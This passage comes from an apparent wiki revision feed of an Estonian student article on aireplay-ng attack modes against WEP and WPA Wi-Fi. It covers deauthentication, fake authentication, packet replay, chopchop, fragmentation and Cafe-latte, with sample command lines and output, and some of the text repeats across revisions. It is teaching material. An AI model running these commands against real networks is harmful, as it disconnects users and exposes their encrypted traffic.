21:33:26  Sending DeAuth to broadcast -- BSSID: [AA:AA:AA:AA:AA:AA]&lt;br /&gt;
21:33:27  Sending DeAuth to broadcast -- BSSID: [AA:AA:AA:AA:AA:AA]&lt;br /&gt;
21:33:27  Sending DeAuth to broadcast -- BSSID: [AA:AA:AA:AA:AA:AA]&lt;br /&gt;
21:33:28  Sending DeAuth to broadcast -- BSSID: [AA:AA:AA:AA:AA:AA]&lt;br /&gt;
...&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
Nagu mainitud, &#039;&#039;broadcast&#039;&#039; lahtiühendamine on vähem efektiivsem.&lt;br /&gt;
&lt;br /&gt;
==Rünnak 1: Fake authentication==&lt;br /&gt;
Võlts autentimine lubab läbi viia nii Open System kui ka Shared Key WEP autentimist, peale selle teeb ta ka assotsiatsiooni access pointiga. See on kasulik ainult siis kui sul on vaja AP&#039;le pakettide saatmiseks assotsiaseeritud klienti, selle puudumisel ei võta AP ühtegi talle saadetud pakki vastu. Kui meil on aga reaalne klient, siis saame tema nimel pakke saata, kui pole, on vaja võlts autentimist.&lt;br /&gt;
Võlts autentimine ei tekita ARP pakette(seega ei piisa selle üksi kasutamisest) ja ei suuda assotsiaseeruda WPA/WPA2 access pointidega.[3]&lt;br /&gt;
&lt;br /&gt;
Fake authenticationit ei tohi kasutada aktiivse kliendi MACiga. See on eriti sobilik meetod selliseks juhuks kui olemasolevalt kliendilt on kinni püütud näiteks ARP pakett, ning klient ühendub lahti enne kui suudad piisavalt arp pakette tagasi mängida. Sellisel juhul aitab sama kliendi MACiga fake autentimine ning siis seda kinnipüütud pakki uuesti/edasi mängida.&lt;br /&gt;
&lt;br /&gt;
===Meetodid===&lt;br /&gt;
====Open Authentication====&lt;br /&gt;
Open authentication puhul ei üritata klienti enne assotsiaseerumist autentida, seega saame kerge vaevaga ennast ära assotsiaseeruda ning hakata AP&#039;ga suhtlema. Selles etapis hakkavad tavakliendid WEP&#039;i(ja seega ka salajast võtit) kasutades rääkima, meie aga saame sisestada juba korrektse võtmega krüptitud(reaalselt kliendilt varem püütud) pakke AP&#039;le saatma, uuesti ja uuesti.[4]&lt;br /&gt;
&amp;lt;pre&amp;gt;$ sudo aireplay-ng -1 0 -a AA:AA:AA:AA:AA:AA -h CC:CC:CC:CC:CC:CC mon0&lt;br /&gt;
21:40:20  Sending Authentication Request&lt;br /&gt;
21:40:20  Authentication successful&lt;br /&gt;
21:40:20  Sending Association Request&lt;br /&gt;
21:40:20  Association successful :-)&amp;lt;/pre&amp;gt;&lt;br /&gt;
Sellisel juhul on assotsiaseerumine õnnestunud võib jätkata teiste rünnakutega - AP võtab vastu vastavalt MACilt tulevaid pakke, ja saadab õigetes tingimustes ka vastuseid.[4]&lt;br /&gt;
&lt;br /&gt;
====Shared Key Authentication====&lt;br /&gt;
SKA tähendab seda, et AP ei räägi potensiaalse kliendiga mitte midagi, va. WEP võtmega autentimise protokoll, seega ei ole võimalik meil AP&#039;ga assotsiaseeruda(me ei tea ju salajast võtit millega autentimisel AP saadetud puzzle ära &amp;quot;lahendada&amp;quot;) ning sellest tulenevalt ei saa me ka AP&#039;le mingeid pakke saata.&lt;br /&gt;
&amp;lt;pre&amp;gt;15:46:53  Sending Authentication Request&lt;br /&gt;
15:46:53  AP rejects open-system authentication&lt;br /&gt;
Please specify a PRGA-file (-y).&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Sellisel juhul on vaja kinni püüda SKA &#039;&#039;handshake&#039;&#039; paketid. See toimub automaatselt kui airodump-ng näeb mõnda WEP-SKA handshake&#039;i. Deauthentimise rünnakuga saab seda olemasolevale kliendile sundida.[7]&lt;br /&gt;
&lt;br /&gt;
Kinnipüütud &#039;&#039;handshake&#039;&#039;`id salvestatakse &amp;quot;sharedkey-01-00-14-6C-7E-40-80.xor&amp;quot; formaadis faili. See fail tuleb vastavasse AP&#039;sse fake autentimisel/kliendi disconnectimisks anda kaasa &amp;quot;-y&amp;quot; käsurea argumendiga.[7]&lt;br /&gt;
&lt;br /&gt;
NOTE: Kui airodump-ng jookseb ilma aktiivseid rünnakuid AP pihta tegemata, siis on AUTH väli WEP AP taga tühi. Kui airodump-ng näeb mända handshake&#039;i siis tuleb AUTH välja sisse SKA, samal hetkel salvestatakse ka fail.[7]&lt;br /&gt;
&lt;br /&gt;
==Rünnak 2: Interactive packet replay==&lt;br /&gt;
&lt;br /&gt;
See rünnak lubab valida konkreetse paketti mida taasmängida. Selle meetodiga saab pakette lugeda kahest kohast, võrgust ja failist. Keskendume võrgust püüdmisele.&lt;br /&gt;
Et interaktiivne uuestimängimine töötaks on tähtis veidi alusteadmisi paketivoo kohta. Iga pakett ei tööta selle rünnakuga. Õnnestumine tähendab seda et AP võtab paki vastu ja genereerib uue IV - WEP ründamiseks on vaja ju koguda palju IV&#039;sid.&lt;br /&gt;
Väga kasulik on panna peale ka &amp;quot;-m 68 -n 86&amp;quot; filtrid. Need filtreerivad vastavalt minimaalse paki suuruse(68- traadita klientilt) ja maksimaalse(86- traadiga kliendilt). Need on WEP ühenduses ARP pakettide suurused ning õigesti kasutades peaksid tagama vastuse AP poolt.[8]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
===Naturaalsed paketid===&lt;br /&gt;
&lt;br /&gt;
Et seda teha, tuleb meil kas taasmängida originaalpaketti, või paketti veidi manipuleerida.  AP&#039;d edastavad(tekitavad uue IV) alati pakkidele mis on suunatud broadcast MACi(FF:FF:FF:FF:FF:FF) vastu. Selline omadus on näiteks ARP pakettidel. Peale selle on vajalik et pakett liiguks traadita kliendist traadiga võrku. Sellisel pakettil on &amp;quot;To DS&amp;quot; lipuke seatud &amp;quot;1&amp;quot; peale.&lt;br /&gt;
Need  filtrid on seadistatavad -b,-d ja -t argumentidega.[8]&lt;br /&gt;
&lt;br /&gt;
===Manipuleeritavad pakid===&lt;br /&gt;
&lt;br /&gt;
Eesmärk, nagu alati, on panna AP genereerima uusi IV&#039;sid. Ainuke vajalik argument on &amp;quot;-t 1&amp;quot; - see selekteerib ainult pakette mis liiguvad etherneti suunas.&lt;br /&gt;
&lt;br /&gt;
Me ei hooli ka mis lõppunkti MAC aadress on, kuna  me saame selle ära muuta.  Selleks on &amp;quot;-p 0841&amp;quot; argument, mis  muudab paki põhimõtte selliseks nagu ta saadetaks kliendist  AP&#039;sse - põmst. muudab &amp;quot;To DS&amp;quot; lipu &amp;quot;1&amp;quot;. Vaja on anda ka &amp;quot;-c&amp;quot; väärtuseks broadcast MAC.[8]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
===Klientideta võrgu ründamine===&lt;br /&gt;
Sellel meetodil on väga huvitav omadus see, et saab rünnata ka traadita-klientideta AP&#039;d. Jooksuta aireplay-d kõige elementaarsemate argumentidega:&lt;br /&gt;
&amp;lt;pre&amp;gt;aireplay-ng -2 -b 00:14:6C:7E:40:80 -d FF:FF:FF:FF:FF:FF -t 1 ath0&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Nüüd jääb üle vaid oodata kuni mõni pakett broadcasti saadetakse. Pole tähtis milline pakket, sisesta lihtsalt &amp;quot;y&amp;quot; esimesele tulevale pakile ja AP hakkab IV&#039;sid genereerima. Negatiivne külg asjal on tõsiasi et paljud pakid on suhteliselt suured - suured pakid genereerivad IV&#039;sid aeglasemalt. Suur pluss on see et ei ole vaja kinni püüda xor paketistriimi(chopchop või fragmenteeritud rünnakud), ehitada pakki ja käivitada relay rünnakut.[8]&lt;br /&gt;
&lt;br /&gt;
==Rünnak 3: ARP request replay attack==&lt;br /&gt;
Klassikaline ARP päringu taasmängimise rünnak on efektiivseim viis IV&#039;de genereerimiseks, ja ta töötab ka piisavalt stabiilselt. Programm kuulab ARP paketti(tunneb ära kindlate mittekrüptimata väljade järgi ja paki pikkuse järgi) ning hakkab seda AP&#039;le taasmängima. See omakorda põhjustab igale päringu vastusele uue IV genereerimise.&lt;br /&gt;
Seda rünnakut võib lugeda interaktiivse taasmängimise erijuhuks.[9]&lt;br /&gt;
&lt;br /&gt;
==Rünnak 4: KoreK chopchop attack==&lt;br /&gt;
See rünnak suudab hea õnne korral dekrüptida WEP paketi ilma salajast võtit teadmata. Meetod võib töötada isegi dünaamilise WEP vastu. See rünnak ei tagasta sulle WEP salajast võtit, vaid paketi sisu ja selle paketi krüptimiseks kasutatud keystreami. Mõned AP&#039;d ei ole sellele rünnakule avatud. Kui AP dropib pakke mille pikkus on alla 42 baidi, siis aireplay üritab ülejäänud baidid ära arvata - edukuse tõenäosus oleneb headerite ennustusvõimest. Kui püütakse kinni IP pakett, siis tehakse lisaks veel checksum kontroll peale arvatava lisabaitide juurdelisamist. Rünnakuks on vaja vähemalt ühte WEP paketti.[10]&lt;br /&gt;
&lt;br /&gt;
===Teooria===&lt;br /&gt;
KoreK kasutab hästituntud nõrga ICV[link] probleemi ja järeldab sellest, et kui pakki lühendada ühe baidi võrra, siis saab sellest ehitada uue korrektse paki, kuna uus ICV on otseselt seotud puuduva krüptimata baidiga. [11]&lt;br /&gt;
&lt;br /&gt;
Esimene samm on võtta püütud pakett (M) ja eemaldada viimane bait, et saada sõnum M-1. Kuna me ei tea eemaldatud baidi &#039;&#039;plaintekst&#039;&#039; väärtust, peame hakkama seda arvama. Õnneks on ainult 256 võimalikku baidiväärtust. Esmaks eeldame siis et eemaldatud bait oli 0x00 ja paneme saadud sõnumi valemisse(liiga mahukas et siin kirjeldada), et luua abitmask mis üritab muuta ebakorrektset M-1 paketti valiidseks M-1 paketiks. Siis proovime paki korrektsust pritsides selle võrku. Kui AP selle kätte saab, siis kontrollitakse seda ja vastavalt aksepteeritakse või ignoreeritakse. Iga saadetud pakk baseerub arvataval baidil, niiet tõenäosus õige olla on 1/256. Kui pakett on aga õige, siis AP valideerib selle ja edastab võrku. Eeldades et sa samal ajal kuulad võrku saad näha kui AP seda teeb. Sellisel juhul tead mis on paki viimane bait. Siis on võimalik arvutada PRGA väärtus mida kasutati selle plaintekst baidi krüptimiseks(P XOR M = RC4 PRGA). Ühesõnaga, ründaja saab bait baidi haaval kogu paketi niimoodi ära arvata, boonuseks on ka keystream millega saad oma paki luua.[11]&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt; .........&lt;br /&gt;
 Offset   38 (90% done) | xor = FD | pt = 08 |  229 frames written in   688ms&lt;br /&gt;
 Offset   37 (92% done) | xor = 13 | pt = 01 |  232 frames written in   695ms&lt;br /&gt;
 Offset   36 (94% done) | xor = 83 | pt = 00 |   19 frames written in    58ms&lt;br /&gt;
 Offset   35 (96% done) | xor = 4E | pt = 06 |  230 frames written in   689ms&lt;br /&gt;
 Sent 957 packets, current guess: B9...&lt;br /&gt;
 &lt;br /&gt;
 The AP appears to drop packets shorter than 35 bytes.&lt;br /&gt;
 Enabling standard workaround: ARP header re-creation.&lt;br /&gt;
 &lt;br /&gt;
 Saving plaintext in replay_dec-0201-191706.cap&lt;br /&gt;
 Saving keystream in replay_dec-0201-191706.xor&lt;br /&gt;
 &lt;br /&gt;
 Completed in 21s (2.29 bytes/s)&amp;lt;/pre&amp;gt;&lt;br /&gt;
Jee! Saad kasutada xor faili oma paki injectimiseks või lugeda paki sisu .cap failist. Vaata ainult et paki injectimisel kasutad autentitud source maci, väga väheste ruuterite korral töötab paki sisestamine &#039;&#039;broadcasti&#039;&#039; ilma autentimata. Soovitatav on võtta ka lühem pakett kuna dekrüptimise aeg on lineaarselt seotud paketi pikkusega.[10]&lt;br /&gt;
&lt;br /&gt;
==Rünnak 5: Fragmentation attack==&lt;br /&gt;
Õnnestumise korral suudab see rünnak tagastada sulle kuni 1500 baiti PRGA&#039;d. See rünnak ei tagasta WEP võtit. Saadud PRGA&#039;ga saab krüptida oma loodud pakette ja neid võrku injectida. Ründamiseks on vaja saada AP&#039;lt vähemalt üks pakett.[12]&lt;br /&gt;
&lt;br /&gt;
Põhimõtteliselt saab programm paketist väikese hulga võtmematerjali ning üritab saata ARP või LLC pakette(kuna selliste pakettide sisu on teada) AP&#039;le. Kui pakett kajatakse tagasi AP poolt siis saab tagastatud paketi põhjal tuletada suurema hulga PRGA baite. Tsüklit saab korrata kuni saadakse kätte kuni 1500 baiti.[12]&lt;br /&gt;
&lt;br /&gt;
See rünnak nõuab head ühendust AP&#039;ga, kuna ründaja fragmenteerib pakette ja AP peab need kõik kätte saama.[12]&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
Saving chosen packet in replay_src-0124-161120.cap&lt;br /&gt;
 Data packet found!&lt;br /&gt;
 Sending fragmented packet&lt;br /&gt;
 Got RELAYED packet!!&lt;br /&gt;
 Thats our ARP packet!&lt;br /&gt;
 Trying to get 384 bytes of a keystream&lt;br /&gt;
 Got RELAYED packet!!&lt;br /&gt;
 Thats our ARP packet!&lt;br /&gt;
 Trying to get 1500 bytes of a keystream&lt;br /&gt;
 Got RELAYED packet!!&lt;br /&gt;
 Thats our ARP packet!&lt;br /&gt;
 Saving keystream in fragment-0124-161129.xor&lt;br /&gt;
 Now you can build a packet with packetforge-ng out of that 1500 bytes keystream&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
Ja meil ongi olemas .xor fail millega saab &#039;&#039;custom&#039;&#039; pakette injectida. Muidugi on vajalik assotsiaseeritud klienti kelle nimelt pakette injectida.[12]&lt;br /&gt;
&lt;br /&gt;
==Rünnak 6: Cafe-latte attack==&lt;br /&gt;
Iga WEP klient kes saab ARP päringu vastab sellele automaatselt korrektselt krüptitud ARP vastustega - selle etapini jõudmiseks ei pea AP tõestama et ta WEP võtit teab.&lt;br /&gt;
Selle rünnakuga saab kinnipüütud paketis pöörata ümber mõned bitid mille käigus pööratakse kliendi ARP päring ta enda poole tagasi. Saates võltsitud ARP päringut kliendile korduvalt saame kinni püüda suurel hulgal korrektseid krüptitud ARP vastuseid.[13]&lt;br /&gt;
&lt;br /&gt;
See rünnak töötab kuna WEP ei ole nõrk mitte ainult statistilise analüüsi rünnakute vastu, vaid tal puudub ka krüptograafilise tugevusega paki terviklikkuse kontroll.&lt;br /&gt;
Lühidalt öeldes ei suuda osapooled eristada võltsitud/modifitseeritud paketti korrektsest pakist.[13]&lt;br /&gt;
&lt;br /&gt;
Iga WEP pakett kasutab CRC checksumi ülekande vigade tuvastamiseks. Ammu aga teatakse et ründaja saab muuta nii paki sisu kui ka CRC&#039;d et luua uus korrektne pakk. Cafe-latte kasutab neid nõrkusi ja muudab ära saatja MACi ja saatja IP aadressi mis sisalduvad kliendi ARP päringus ning suunavad need kliendi vastu.[13]&lt;br /&gt;
&lt;br /&gt;
Kuna klient ei suuda võltsingut eristada, vastabki ka igale päringule.[13]&lt;br /&gt;
&lt;br /&gt;
===Kasutamine===&lt;br /&gt;
Seda rünnakut saab kasutada reaalsest võrgust eraldatud kliendi puhul. Kliendid teevad tuntud võrkude otsimisel PROBE päringuid, millele saab ründaja siis fake APga vastata. Sellisel juhul peaks kasutama &amp;quot;-D&amp;quot; argumenti et lülitada välja AP otsimine.[14]&lt;br /&gt;
&lt;br /&gt;
==Rünnak 7: Client-oriented fragmentation attack==&lt;br /&gt;
Selle rünnakuga saab kasutada suvalist IP või ARP paketti. See laiendab Cafe-Latte rünnakut lubades kasutada suvalist paketti kliendilt.&lt;br /&gt;
Sellest paketist peame genereerima ARP päringu. ARPil peab asuma baidipositsioonil 33 sihtmärgi IP ning sihtmärgi MAC peab olema nullbaidi jada.&lt;br /&gt;
Praktikas võib sihtmärgi MAC olla aga suvaline väärtus.[15]&lt;br /&gt;
&lt;br /&gt;
Saadud pakis on teada koht kus asub lähtepunkti IP aadress - bait 23 ARP puhul ja 21 IP puhul. Eeldatakse et pakk on ARP kui paki suurus on 68 või 86 baiti, vastaseljuhul eeldatakse et on IP pakett.[15]&lt;br /&gt;
&lt;br /&gt;
===ARP===&lt;br /&gt;
Korrektse ARP päringu saatmiseks kliendile peame liigutama lähtekoha IP aadress positsioonile 33. Muidugi ei saa seda niisama lihtsalt teha - pakk ei valideeruks. Selle vastu kasutame aga paketi fragmenteerimist. ARP saadetakse kliendile kahe fragmendina. Esimese fragmendi pikkus valitakse niimoodi et paketi kokkupanemisel kliendi poolt satuks lähtekoha(kliendi) IP positsioonile 33(sihtmärk). Teine fragment on pakett mis kliendilt alguses saadi.[15]&lt;br /&gt;
&lt;br /&gt;
===IP===&lt;br /&gt;
IP paketi puhul kasutatakse sarnast meetodit. Aga kuna PRGA materjali on vähem, siis saadetakse välja kolm fragmenti pluss algne pakk.[15]&lt;br /&gt;
&lt;br /&gt;
Igaljuhul kasutatakse CRC korrektsuse säilitamiseks &#039;&#039;bit flippingut&#039;&#039;. Sama meetodit kasutatakse ka ARP paketi lähtekoha MAC&#039;i muutmiseks juhul kui seal on algselt &#039;&#039;multicast&#039;&#039;.[15]&lt;br /&gt;
&lt;br /&gt;
=Viited=&lt;br /&gt;
[1] http://www.aircrack-ng.org/doku.php?id=aireplay-ng&lt;br /&gt;
&lt;br /&gt;
[2] http://www.aircrack-ng.org/doku.php?id=deauthentication&lt;br /&gt;
&lt;br /&gt;
[3] http://www.aircrack-ng.org/doku.php?id=fake_authentication&lt;br /&gt;
&lt;br /&gt;
[4] https://secure.wikimedia.org/wikipedia/en/wiki/Wired_Equivalent_Privacy&lt;br /&gt;
&lt;br /&gt;
[5] http://documentation.netgear.com/reference/sve/wireless/WirelessNetworkingBasics-3-08.html&lt;br /&gt;
&lt;br /&gt;
[6] http://documentation.netgear.com/reference/sve/wireless/WirelessNetworkingBasics-3-09.html&lt;br /&gt;
&lt;br /&gt;
[7] http://www.aircrack-ng.org/doku.php?id=shared_key&lt;br /&gt;
&lt;br /&gt;
[8] http://www.aircrack-ng.org/doku.php?id=interactive_packet_replay&lt;br /&gt;
&lt;br /&gt;
[9] http://www.aircrack-ng.org/doku.php?id=arp-request_reinjection&lt;br /&gt;
&lt;br /&gt;
[10] http://www.aircrack-ng.org/doku.php?id=korek_chopchop&lt;br /&gt;
&lt;br /&gt;
[11] http://www.informit.com/guides/content.aspx?g=security&amp;amp;seqNum=197&lt;br /&gt;
&lt;br /&gt;
[12] http://www.aircrack-ng.org/doku.php?id=fragmentation&lt;br /&gt;
&lt;br /&gt;
[13] http://www.wi-fiplanet.com/tutorials/article.php/10724_3716241_2&lt;br /&gt;
&lt;br /&gt;
[14] http://www.aircrack-ng.org/doku.php?id=cafe-latte&lt;br /&gt;
&lt;br /&gt;
[15] http://www.aircrack-ng.org/doku.php?id=hirte&lt;br /&gt;
&lt;br /&gt;
[[Category:Traadita_side_alused]]&lt;/div&gt;</summary>
		<author><name>Tliiv</name></author>
	</entry>
	<entry>
		<id>https://wiki.itcollege.ee/index.php?title=Aireplay-ng_r%C3%BCndere%C5%BEiimid&amp;diff=32784</id>
		<title>Aireplay-ng ründerežiimid</title>
		<link rel="alternate" type="text/html" href="https://wiki.itcollege.ee/index.php?title=Aireplay-ng_r%C3%BCndere%C5%BEiimid&amp;diff=32784"/>
		<updated>2011-05-24T18:36:13Z</updated>

		<summary type="html">&lt;p&gt;Tliiv: /* Broadcast */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;=Autor=&lt;br /&gt;
Tanel Liiv D22 (2011)&lt;br /&gt;
&lt;br /&gt;
=Sissejuhatus=&lt;br /&gt;
&lt;br /&gt;
Aireplay-ng`d kasutatakse &#039;&#039;frame&#039;&#039;`de sisestamiseks võrguliiklusesse.[1]&lt;br /&gt;
&lt;br /&gt;
Peamine funktsioon on liikluse genereerimine hilisemaks kasutamiseks aircrack-ng`s - [https://secure.wikimedia.org/wikipedia/en/wiki/Wired_Equivalent_Privacy WEP] ja [https://secure.wikimedia.org/wikipedia/en/wiki/WPA-PSK WPA-PSK] võtmete lahtimurdmiseks. Erinevad rünnakuviisid võimaldavad tekitada deautentimist WPA &#039;&#039;handshake&#039;&#039; pakettide püüdmiseks, võlts deautentimiseks, interaktiivseks pakettide taasmängimiseks ja käsitsi valmistatud ARP päringute sisestamiseks liiklusesse.[1]&lt;br /&gt;
&lt;br /&gt;
=Eelteadmised=&lt;br /&gt;
WEP ja WPA/WPA2 võrkude ründamiseks on vajalikud mõned konkreetsed eelteadmised. Nende teadmine lihtsustab suurel määral võimalike probleemide lahendamist ja annab paremini aimu millega tegu on ja kuidas asjad &#039;&#039;backendis&#039;&#039; töötavad - ei teki näiteks viga kus üritatakse taasmängida paketti kui ühtegi klienti pole APga assotsiaseerunud.&lt;br /&gt;
&lt;br /&gt;
Samuti eeldatakse et teatakse aireplay-ng põhikäske ja argumente - nullist õppimiseks ei ole see mõeldud.&lt;br /&gt;
&lt;br /&gt;
==WEP==&lt;br /&gt;
WEPi ründamiseks on vaja eristada Open Authentication ja Shared Key Authentication süsteemi&lt;br /&gt;
===Open Authentication===&lt;br /&gt;
[http://documentation.netgear.com/reference/sve/wireless/images/WEPauthenticationOpen.jpg][5]&lt;br /&gt;
&lt;br /&gt;
* Klient saadab autentimis päringu AP&#039;le.[5]&lt;br /&gt;
* AP autentib kliendi.[5]&lt;br /&gt;
** AP laseb selles etapis kõik kliendid läbi, st. mingit autentimist(sõna otseses mõttes) ei toimu[5]&lt;br /&gt;
* Klient assotsiaseerub AP&#039;ga ja liitub võrguga.[5]&lt;br /&gt;
** Selles etapis hakkavad mõlemad osapooled andmeid saatma WEPi krüpteeringuga, st. edasiseks suhtlemiseks on vaja teada salajast võtit. Sellesse punkti jõudes on võimalik assotsiaseerunud kliendi MACiga saata AP&#039;le pakette(nõrkus).[5]&lt;br /&gt;
&lt;br /&gt;
===Shared Key Authentication===&lt;br /&gt;
[http://documentation.netgear.com/reference/sve/wireless/images/WEPauthenticationShared.jpg] [6]&lt;br /&gt;
&lt;br /&gt;
* Klient saadab autentimise päringu AP&#039;le.[6]&lt;br /&gt;
* AP saadab kliendile &#039;&#039;random&#039;&#039; baidijada(ülesanne).[6]&lt;br /&gt;
* Klient kasutab oma 64- või 128bitist salajast võtit ning krüptib saadud baidijada ära, ning saadab tagasi AP&#039;le.[6]&lt;br /&gt;
* AP dekrüptib saadud jada ning võrdleb seda esialgu väljasaadetud stringiga, kui need ei kattu, siis saadetakse kliendile negatiivne vastus. Kui kattub siis järelikult on kliendil ja AP&#039;l sama WEP võti, ning AP autentib kliendi ära.[6]&lt;br /&gt;
* Klient ühendub võrku.[6]&lt;br /&gt;
&lt;br /&gt;
Sellisel juhul ei ole võimalik autentimisest edasi saada ilma võtmeta, ning seega ei saa ka AP&#039;le pakke võrku sisestada. (Lahendus probleemile on #Shared Key Authentication artikli all)&lt;br /&gt;
&lt;br /&gt;
=Meetodid=&lt;br /&gt;
Meetodite pealkrijade ees on &amp;quot;Rünnak x:&amp;quot;. x tähistab numbrit mitmes implementeeritud rünnak see on ja seda numbrit aksepteerib aireplay-ng ka vastava käsurea lipu argumendina.&lt;br /&gt;
==Rünnak 0: Deauthentication==&lt;br /&gt;
&lt;br /&gt;
See meetod saab disassotsiaseerumise paketi ühele või rohkemale kliendile kes on parasjagu vastava &#039;&#039;access pointiga&#039;&#039; assotsiaseerunud. Klientide lahtiühendamisel võib olla mitu eesmärki:[2]&lt;br /&gt;
&lt;br /&gt;
* Peidetud ESSID kättesaamine. See on ESSID mida access point ei kuuluta &#039;&#039;broadcastis&#039;&#039;.[2]&lt;br /&gt;
* WPA/WPA2 handshake kinnipüüdmine sundides klienti uuesti autentima.(Ei ole kohustuslik, võib oodata ka kuni klient ise uuesti ühendub)[2]&lt;br /&gt;
* ARP päringute genereerimine(Windowsi kliendid võivad mõnikord oma ARP &#039;&#039;cache&#039;&#039; tühjendada kui ühendus ära kaob)[2]&lt;br /&gt;
&lt;br /&gt;
NB! Arusaadavalt on see rünnak täiesti kasutu kui traadita ühenduspunkti küljes ei ole ühtegi reaalset assotsiaseerunud klienti või võlts autentitud klienti.[2]&lt;br /&gt;
&lt;br /&gt;
===Meetodid===&lt;br /&gt;
&lt;br /&gt;
====Suunatud====&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
$ sudo aireplay-ng -0 100 -a AA:AA:AA:AA:AA:AA -c CC:CC:CC:CC:CC:CC mon0&lt;br /&gt;
21:36:02  Waiting for beacon frame (BSSID: AA:AA:AA:AA:AA:AA) on channel 11&lt;br /&gt;
21:36:03  Sending 64 directed DeAuth. STMAC: [CC:CC:CC:CC:CC:CC] [ 38|38 ACKs]&lt;br /&gt;
21:36:03  Sending 64 directed DeAuth. STMAC: [CC:CC:CC:CC:CC:CC] [ 54|54 ACKs]&lt;br /&gt;
21:36:04  Sending 64 directed DeAuth. STMAC: [CC:CC:CC:CC:CC:CC] [ 54|54 ACKs]&lt;br /&gt;
21:36:04  Sending 64 directed DeAuth. STMAC: [CC:CC:CC:CC:CC:CC] [ 38|50 ACKs]&lt;br /&gt;
21:36:05  Sending 64 directed DeAuth. STMAC: [CC:CC:CC:CC:CC:CC] [ 54|54 ACKs]&lt;br /&gt;
21:36:06  Sending 64 directed DeAuth. STMAC: [CC:CC:CC:CC:CC:CC] [ 54|54 ACKs]&lt;br /&gt;
21:36:06  Sending 64 directed DeAuth. STMAC: [CC:CC:CC:CC:CC:CC] [ 2|54 ACKs]&lt;br /&gt;
...&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
* BSSID peab olema sihtmärk AP korrektne MAC aadress[2]&lt;br /&gt;
* kanal peab olema sama millel AP reaalselt räägib[2]&lt;br /&gt;
* STMAC on rünnatava kliendi korrektne MAC aadress[2]&lt;br /&gt;
&lt;br /&gt;
* &#039;&#039;&#039;Sending 64 directed&#039;&#039;&#039; - saadeti välja 64 suunatud deautentimise paketti, st. 64 kliendile ja 64 AP&#039;le.[2]&lt;br /&gt;
* &#039;&#039;&#039;61&#039;&#039;&#039; - mitu paketti klient kätte sai[2]&lt;br /&gt;
* &#039;&#039;&#039;63&#039;&#039;&#039; - mitu paketti AP kätte sai[2]&lt;br /&gt;
&lt;br /&gt;
Kui 61 ja 63 on arvud mis on suhteliselt stabiilsed ja lähedal 64&#039;le, siis tähendab see seda et mõlemad osapooled on sinu võrgukaardi antennist kuuldekaugusel ja nendega on võimalik infot vahetada. Kui üks neist numbritest on väike, siis tähendab seda et asud vastavast osapoolest liiga kaugel - sellisel juhul see rünnak ei tööta, sul on vaja kas saatja saatevõimet suurendada, või minna osapoolele füüsiliselt lähemale.[2]&lt;br /&gt;
&lt;br /&gt;
Suunatud &#039;&#039;versus&#039;&#039; broadcast olukorras on alati soovitav kasutada suunatud varianti, kuna paljud kliendid ignoreerivad broadcastis saadetud lahtiühendamise paketti.[2]&lt;br /&gt;
&lt;br /&gt;
Kui sulle kliendi ACK&#039;ide arv tundub korrektne, aga sulle ikkagi ei tundu et ta ennast lahti ühendaks, siis võib probleem peituda selles et ta ühendub uuesti liiga kiiresti.[2]&lt;br /&gt;
&lt;br /&gt;
====Broadcast====&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
$ sudo aireplay-ng -0 100 -a AA:AA:AA:AA:AA:AA  mon0&lt;br /&gt;
21:33:25  Waiting for beacon frame (BSSID: AA:AA:AA:AA:AA:AA) on channel 11&lt;br /&gt;
NB: this attack is more effective when targeting&lt;br /&gt;
a connected wireless client (-c &amp;lt;client&#039;s mac&amp;gt;).&lt;br /&gt;
21:33:25  Sending DeAuth to broadcast -- BSSID: [AA:AA:AA:AA:AA:AA]&lt;br /&gt;
21:33:26  Sending DeAuth to broadcast -- BSSID: [AA:AA:AA:AA:AA:AA]&lt;br /&gt;
21:33:26  Sending DeAuth to broadcast -- BSSID: [AA:AA:AA:AA:AA:AA]&lt;br /&gt;
21:33:27  Sending DeAuth to broadcast -- BSSID: [AA:AA:AA:AA:AA:AA]&lt;br /&gt;
21:33:27  Sending DeAuth to broadcast -- BSSID: [AA:AA:AA:AA:AA:AA]&lt;br /&gt;
21:33:28  Sending DeAuth to broadcast -- BSSID: [AA:AA:AA:AA:AA:AA]&lt;br /&gt;
...&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
Nagu mainitud, &#039;&#039;broadcast&#039;&#039; lahtiühendamine on vähem efektiivsem.&lt;br /&gt;
&lt;br /&gt;
==Rünnak 1: Fake authentication==&lt;br /&gt;
Võlts autentimine lubab läbi viia nii Open System kui ka Shared Key WEP autentimist, peale selle teeb ta ka assotsiatsiooni access pointiga. See on kasulik ainult siis kui sul on vaja AP&#039;le pakettide saatmiseks assotsiaseeritud klienti, selle puudumisel ei võta AP ühtegi talle saadetud pakki vastu. Kui meil on aga reaalne klient, siis saame tema nimel pakke saata, kui pole, on vaja võlts autentimist.&lt;br /&gt;
Võlts autentimine ei tekita ARP pakette(seega ei piisa selle üksi kasutamisest) ja ei suuda assotsiaseeruda WPA/WPA2 access pointidega.[3]&lt;br /&gt;
&lt;br /&gt;
Fake authenticationit ei tohi kasutada aktiivse kliendi MACiga. See on eriti sobilik meetod selliseks juhuks kui olemasolevalt kliendilt on kinni püütud näiteks ARP pakett, ning klient ühendub lahti enne kui suudad piisavalt arp pakette tagasi mängida. Sellisel juhul aitab sama kliendi MACiga fake autentimine ning siis seda kinnipüütud pakki uuesti/edasi mängida.&lt;br /&gt;
&lt;br /&gt;
===Meetodid===&lt;br /&gt;
====Open Authentication====&lt;br /&gt;
